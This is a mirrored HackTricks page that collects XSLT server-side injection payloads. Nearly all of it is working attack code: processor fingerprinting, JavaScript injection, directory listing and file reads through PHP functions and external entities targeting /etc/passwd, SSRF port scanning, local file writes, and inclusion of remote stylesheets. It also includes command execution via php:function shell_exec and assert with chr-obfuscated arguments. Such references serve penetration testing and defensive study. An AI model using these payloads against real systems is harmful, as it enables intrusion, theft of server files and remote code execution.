mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
219 lines
7 KiB
Markdown
219 lines
7 KiB
Markdown
|
# XSLT Server Side Injection \(Extensible Stylesheet Languaje Transformations\)
|
||
|
|
||
|
It is used to transform XML documents in another kind. Versions: 1, 2 and 3 \(1 is the most used\).
|
||
|
The transformation can be done in the server or in the browser\).
|
||
|
|
||
|
The most used frameworks are: **Libxslt** \(Gnome\), **Xalan** \(Apache\) and **Saxon** \(Saxonica\).
|
||
|
|
||
|
## Fingerprint
|
||
|
|
||
|
Upload this and take information
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
|
<xsl:template match="/">
|
||
|
Version: <xsl:value-of select="system-property('xsl:version')" /><br />
|
||
|
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
|
||
|
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
|
||
|
<xsl:if test="system-property('xsl:product-name')">
|
||
|
Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
|
||
|
</xsl:if>
|
||
|
<xsl:if test="system-property('xsl:product-version')">
|
||
|
Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
|
||
|
</xsl:if>
|
||
|
<xsl:if test="system-property('xsl:is-schema-aware')">
|
||
|
Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
|
||
|
</xsl:if>
|
||
|
<xsl:if test="system-property('xsl:supports-serialization')">
|
||
|
Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
|
||
|
/><br />
|
||
|
</xsl:if>
|
||
|
<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
|
||
|
Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
|
||
|
/><br />
|
||
|
</xsl:if>
|
||
|
</xsl:template>
|
||
|
</xsl:stylesheet>
|
||
|
```
|
||
|
|
||
|
## Javascript Injection
|
||
|
|
||
|
```text
|
||
|
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
|
<xsl:template match="/">
|
||
|
<script>confirm("We're good");</script>
|
||
|
</xsl:template>
|
||
|
</xsl:stylesheet>
|
||
|
```
|
||
|
|
||
|
## Directory listing \(PHP\)
|
||
|
|
||
|
### **Opendir + readdir**
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" encoding="utf-8"?>
|
||
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
|
<xsl:template match="/">
|
||
|
<xsl:value-of select="php:function('opendir','/path/to/dir')"/>
|
||
|
<xsl:value-of select="php:function('readdir')"/> -
|
||
|
<xsl:value-of select="php:function('readdir')"/> -
|
||
|
<xsl:value-of select="php:function('readdir')"/> -
|
||
|
<xsl:value-of select="php:function('readdir')"/> -
|
||
|
<xsl:value-of select="php:function('readdir')"/> -
|
||
|
<xsl:value-of select="php:function('readdir')"/> -
|
||
|
<xsl:value-of select="php:function('readdir')"/> -
|
||
|
<xsl:value-of select="php:function('readdir')"/> -
|
||
|
<xsl:value-of select="php:function('readdir')"/> -
|
||
|
</xsl:template></xsl:stylesheet>
|
||
|
```
|
||
|
|
||
|
### **Assert \(var\_dump + scandir + false\)**
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||
|
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
||
|
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
||
|
<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)))==3')" />
|
||
|
<br />
|
||
|
</body>
|
||
|
</html>
|
||
|
```
|
||
|
|
||
|
## Read files
|
||
|
|
||
|
### **Internal**
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" encoding="utf-8"?>
|
||
|
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "/etc/passwd">]>
|
||
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
|
<xsl:template match="/">
|
||
|
&ext_file;
|
||
|
</xsl:template>
|
||
|
</xsl:stylesheet>
|
||
|
```
|
||
|
|
||
|
### **Through HTTP**
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" encoding="utf-8"?>
|
||
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
|
<xsl:template match="/">
|
||
|
<xsl:value-of select="document('/etc/passwd')"/>
|
||
|
</xsl:template>
|
||
|
</xsl:stylesheet>
|
||
|
```
|
||
|
|
||
|
```text
|
||
|
<!DOCTYPE xsl:stylesheet [
|
||
|
<!ENTITY passwd SYSTEM "file:///etc/passwd" >]>
|
||
|
<xsl:template match="/">
|
||
|
&passwd;
|
||
|
</xsl:template>
|
||
|
```
|
||
|
|
||
|
### **Internal \(PHP\)**
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" encoding="utf-8"?>
|
||
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
|
<xsl:template match="/">
|
||
|
<xsl:value-of select="php:function('file_get_contents','/path/to/file')"/>
|
||
|
</xsl:template>
|
||
|
</xsl:stylesheet>
|
||
|
```
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||
|
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
||
|
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
||
|
<xsl:copy-of name="asd" select="php:function('assert','var_dump(file_get_contents(scandir(chr(46).chr(47))[2].chr(47).chr(46).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100)))==3')" />
|
||
|
<br />
|
||
|
</body>
|
||
|
</html>
|
||
|
```
|
||
|
|
||
|
### Port scan
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" encoding="utf-8"?>
|
||
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
|
<xsl:template match="/">
|
||
|
<xsl:value-of select="document('http://example.com:22')"/>
|
||
|
</xsl:template>
|
||
|
</xsl:stylesheet>
|
||
|
```
|
||
|
|
||
|
## Write to a file
|
||
|
|
||
|
### XSLT 2.0
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" encoding="utf-8"?>
|
||
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
|
<xsl:template match="/">
|
||
|
<xsl:result-document href="local_file.txt">
|
||
|
<xsl:text>Write Local File</xsl:text>
|
||
|
</xsl:result-document>
|
||
|
</xsl:template>
|
||
|
</xsl:stylesheet>
|
||
|
```
|
||
|
|
||
|
### **Xalan-J extension**
|
||
|
|
||
|
```text
|
||
|
<xsl:template match="/">
|
||
|
<redirect:open file="local_file.txt"/>
|
||
|
<redirect:write file="local_file.txt"/> Write Local File</redirect:write>
|
||
|
<redirect:close file="loxal_file.txt"/>
|
||
|
</xsl:template>
|
||
|
```
|
||
|
|
||
|
Other ways to write files in the PDF
|
||
|
|
||
|
## Include external XSL
|
||
|
|
||
|
```text
|
||
|
<xsl:include href="http://extenal.web/external.xsl"/>
|
||
|
```
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" ?>
|
||
|
<?xml-stylesheet type="text/xsl" href="http://external.web/ext.xsl"?>
|
||
|
```
|
||
|
|
||
|
## Execute code
|
||
|
|
||
|
### **php:function**
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" encoding="utf-8"?>
|
||
|
<xsl:stylesheet version="1.0"
|
||
|
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
|
||
|
xmlns:php="http://php.net/xsl" >
|
||
|
<xsl:template match="/">
|
||
|
<xsl:value-of select="php:function('shell_exec','sleep 10')" />
|
||
|
</xsl:template>
|
||
|
</xsl:stylesheet>
|
||
|
```
|
||
|
|
||
|
```text
|
||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||
|
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
||
|
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
||
|
<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)));')" />
|
||
|
<br />
|
||
|
</body>
|
||
|
</html>
|
||
|
```
|
||
|
|
||
|
Execute code using other frameworks in the PDF
|
||
|
|
||
|
### **References**
|
||
|
|
||
|
[XSLT\_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT_SSRF.pdf)
|
||
|
[http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf)
|
||
|
[http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf)
|
||
|
|